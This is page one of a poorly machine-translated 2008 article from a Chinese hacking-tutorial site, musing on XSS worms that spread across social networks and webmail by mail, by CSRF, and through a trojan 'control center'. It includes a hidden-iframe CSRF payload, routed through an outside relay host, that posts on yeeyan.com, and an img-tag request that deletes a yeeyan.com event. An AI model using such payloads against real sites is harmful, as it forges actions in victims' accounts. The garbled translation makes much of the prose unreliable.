Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
About cross territory worm's existence
  Add date: 07/25/2008   Publishing date: 07/25/2008   Hits: 2
Total 2 pages, Current page:1, Jump to page:
 
These days have analyzed several big website XSS&CSRF cracks, also start to ponder the cross territory worm's question. After QZ decorates the clever page, had discovered under IE6 cross territory BUG, this discovery brings the impact may not only be robs cookie to be so simple:), but under me must mention the cross territory worm has nothing to do with this BUG, this article is purely YY.

XSS Worm cannot leave the SNS network, the technical core non-XMLHttpRequest object not is popularly, I have written several SNS network Worm, if between these Worm may correspond mutually (breaks through oneself to be unable cross territory flaw), that harm will be bigger, can be more interesting:). How first do we want to be clear about in Webx.0 world Worm the survival requirement as well as they are reproduce (omitted). Must let between Worm correspond, the method has many.

First, Mail-to-Mail Worm:

Between the mailbox may send the mail mutually, Mail Worm may draw support from this to call the roll of officers and assign them tasks payload (XSS Trap) to disseminate in the different mailbox service, certainly by now payload was nearly is dissimilar. For instance sohu mail XSS Worm and QQ mail XSS Worm, their correspondence channel definitely may borrow mail's to send the function mutually. Under these two different mail environment Worm DOM logic will be definitely dissimilar, the basic functional module may share, for instance the XMLHttpRequest object as well as some from the defining function and so on, such cross territory Worm must have basically judges own locates environment ability, this will be very simple.

This is the cross territory worm simple the model.

Second, CSRF Worm:

This kind of pattern's cross territory worm must borrow the CSRF crack. For instance I erupted XSS Worm on myspace.cn, but on yeeyan.com has the very preliminary CSRF crack, how can I the myspace on prestige entrainment to yeeyan on? By now might join such code in myspace.cn XSS Worm:

<iframe src= http://www.0 * 37.com/Project/csrf/do.asp?csrf=http://www.yeeyan.com/groups/newTopic/&data [Post][content]=HI+CSRF:)&ymsggroup=&ymsgee=19076&ymsgee_username=19076 width=0 height=0></iframe>

If is simple transmission request, may:

<img src= http://www.yeeyan.com/space/deleteEvent/15728 >

My supposition myspace.cn and yeeyan.com have some kind of cooperation, the user need the service which frequently this both provide, and landed these two SNS network, when then myspace user A by XSS Worm infection, will transmit the CSRF request for yeeyan user B (A and B in the real world will be identical person), then user B automatically will issue a message on yeeyan. But if this message is in itself XSS Trap? Or is one in view of the yeeyan.com CSRF deceit information? Ha-ha, how is to reproduce as for the worm, this is one kind of art:).

Third, net horse main center:

Also mentioned this concept. Such main center should not limit in hangs the horse technology in the application, independent Web2.0 Worm needs a control center, guaranteed that does not have any relational between Worm to be possible originally to correspond mutually. But the net horse main center is this correspondence middle key position:). The net horse main center should also achieve to the net horse and the Web2.0 Worm real-time control. This has, but also is not very perfect. I have said that develops this main center this to need to unify the complex service end technology. This was already one kind of trend of development.

 
Other pages: : 1 * 2 * Next>>
Prev:Travel of the JSP+Oracle SQL Injection Next:Reorganizes some ROOTKIT the material

Comment:

Category: Home > hacker course
Home